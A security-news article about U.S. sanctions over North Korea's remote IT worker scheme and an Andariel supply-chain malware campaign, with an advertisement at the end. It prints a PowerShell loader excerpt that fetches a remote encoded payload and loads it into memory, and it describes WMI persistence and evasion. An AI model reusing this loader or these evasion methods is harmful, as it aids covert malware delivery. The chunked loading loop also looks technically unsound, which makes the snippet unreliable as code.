US Sanction Key Threat Actors Linked With North Korea’s Remote IT Worker Scheme

The U.S. Treasury’s July 8 action against Song Kum Hyok and four Russia-based entities pulled back the curtain on a sophisticated malware-enabled revenue pipeline that has quietly bankrolled Pyongyang’s weapons programs for years.

Investigators trace the campaign to Andariel, a Reconnaissance General Bureau (RGB) sub-unit already notorious for high-value cryptocurrency heists.

By embedding North Korean developers inside legitimate software projects, the group obtained persistent, code-signing access to corporate repositories and CI/CD pipelines, allowing malicious updates to ride trusted channels.

Within weeks of onboarding, the rogue contractors began seeding an innocuous-looking JavaScript dependency that, once compiled, side-loaded a PowerShell stager to contact *.china-cdn[.]org, a domain masquerading as a content mirror.

The U.S. Department of the Treasury analysts noted the stager’s beacon interval dynamically shifts between 90 and 600 seconds, thwarting traffic-shape baselines.

The same analysts identified that every build job reaching GitHub Actions runners after March 2025 contained the altered dependency—evidence that supply-chain poisoning rather than spear-phishing was the preferred attack vector.

Victims span fintech, healthcare, and industrial IoT vendors on three continents; in several cases, corrupted binaries were pushed to over-the-air update servers, effectively weaponizing routine patch cycles.

Treated devices later funneled telemetry, clipboard data, and cryptocurrency wallet files to Andariel’s command tier, compressing exfiltrated content with LZNT1 before AES-256 encryption. Treasury researchers noted the group monetized stolen wallets directly, while other data was sold in Russian underground markets.

Memory-Resident Loader

The initial JavaScript implant merely fetches a Base64-encoded blob stored in a GitHub Gist referenced as “worker-resume.txt”.

The blob expands into a four-stage PowerShell script that never touches disk, leveraging Add-Type to compile C# inline and hijack the Windows Management Instrumentation service for persistence.

A condensed excerpt illustrates the crucial hand-off:-

$raw = Invoke-RestMethod $gurl  
$bytes = [System.Convert]::FromBase64String($raw)  
$decomp = [System.IO.Compression.DeflateStream]::new(  
  [System.IO.MemoryStream]::new($bytes), 'Decompress')  
$buf = New-Object byte[] 0x2000  
while(($len = $decomp.Read($buf,0,$buf.Length)) -gt 0){  
  [System.Reflection.Assembly]::Load($buf[0..($len-1)]) | Out-Null  
}  
Start-Sleep (Get-Random -Min 90 -Max 600)  

Each execution loads an encrypted .NET payload directly into memory, thwarting traditional file-based antivirus scans and leaving only volatile artifacts in amsi.dll hooks.

The malign DLL then registers an event consumer under root\subscription, ensuring revival after reboots without creating new services or registry run-keys—an evasion tactic that kept host-based detection rates below 5 percent in VirusTotal submissions through June 2025.

Continued sanctions pressure will complicate cash-out avenues, yet the campaign’s low footprint underscores why remote contractor workflows remain an attractive, hard-to-audit conduit for state-sponsored malware operators.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now